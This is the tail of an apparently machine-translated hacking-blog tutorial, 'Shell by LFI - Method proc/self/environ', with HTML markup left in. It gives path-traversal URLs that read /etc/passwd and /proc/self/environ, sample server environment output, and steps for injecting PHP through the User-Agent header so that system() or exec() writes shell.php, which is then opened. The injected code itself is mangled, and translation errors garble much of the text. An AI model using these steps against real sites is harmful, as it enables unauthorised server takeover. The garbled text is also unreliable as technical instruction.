HTTP_COOKIE = HTTP_HOST =<a href="http://www.website.com/" style="color: #02679c; text-decoration: none;" target="_blank">www.website.com</a> 134cc7261b341231b9594844ac2ad7ac<br /> <br /> http://<a href="http://www.website.com/index.php?view%3D../../../../../../etc/passwd" style="color: #02679c; text-decoration: none;" target="_blank">Http://www.website.com/index.php?view=../../../../../../etc/passwd</a> HTTP_REFERER = HTTP_USER_AGENT = Opera/9.80 (Windows NT 5.1, U , en) Presto/2.2.15<br /> <br /> Version/10.00 PATH = / bin: / usr / bin QUERY_STRING = view =..% 2F ..% 2F ..% 2F ..% 2F ..% 2F ..% 2Fproc% 2Fself% 2Fenviron REDIRECT_STATUS = 200 REMOTE_ADDR = 6x .1 xx.4x.1xx<br /> <br /> REMOTE_PORT = 35665 REQUEST_METHOD = GET REQUEST_URI = / index.php? View =..% 2F ..% 2F ..% 2F ..% 2F ..% 2F ..% 2Fproc% 2Fself% 2Fenviron<br /> <br /> SCRIPT_FILENAME = / home / sirgod / public_html / index.php SCRIPT_NAME = / index.php SERVER_ADDR = 1xx.1xx.1xx.6x SERVER_ADMIN = <a href="mailto:webmaster@website.com">webmaster@website.com</a><br /> <br /> SERVER_NAME = <a href="http://www.website.com/" style="color: #02679c; text-decoration: none;" target="_blank">www.website.com</a> SERVER_PORT = 80 SERVER_PROTOCOL = HTTP/1.0 SERVER_SIGNATURE =<br /> Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV / 2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at <a href="http://www.website.com/" style="color: #02679c; text-decoration: none;" target="_blank">www.website.com</a> Port 80</div> proc / self / environ is accesibil.Daca get a blank page, an error means it is not accessible or operating system is FreeBSD.<br /> <br /> <br /> <h3> >> 4 - malicious code injection</h3> <br /> - Now let us inject malicious code in proc / self / environ.Cum we do this? Inject code in HTTP User-Agent header.<br /> Use Tamper Data addon's for Firefox to change User-Agent-ul.Porniti Tamper date and make a request to the URL:<br /> <br /> <a href="http://www.website.com/view.php?page%3D../../../" style="color: #02679c; text-decoration: none;" target="_blank">www.website.com/view.php?page=../../../</a> ... LF / environ<br /> <br /> Choose Tamper and User-Agent field write the following code:<br /> <br /> A shell.php available @ ;?><br /> <br /> Then, submit the request.<br /> <br /> Our command will be executed in<br /> through function system (), and our shell will be creat.Daca does not work, try exec () because system () can be<br /> restricted on a server in php.ini<br /> <br /> <h3> >> 5 - Access to the shell</h3> <br /> - Now check if our code has been injected with malicious <a href="http://succes.sa/" style="color: #02679c; text-decoration: none;" target="_blank">succes.Sa</a> see if the shell is present.<br /> <br /> <a href="http://www.website.com/" style="color: #02679c; text-decoration: none;" target="_blank">www.website.com</a> / shell.php<br /> <br /> Shell was successful.<br /> <br /> i hope you enjoy!!!<br /> </div>

Hacking Hacking Tutorials LFI Tutorials Shell by LFI - Method proc / self / environ

1 - Introduction 2 - Discovery LFI 3 - check if / proc / self / environ is accessible 4 - malicious code injection 5 - Access to th...

Read more »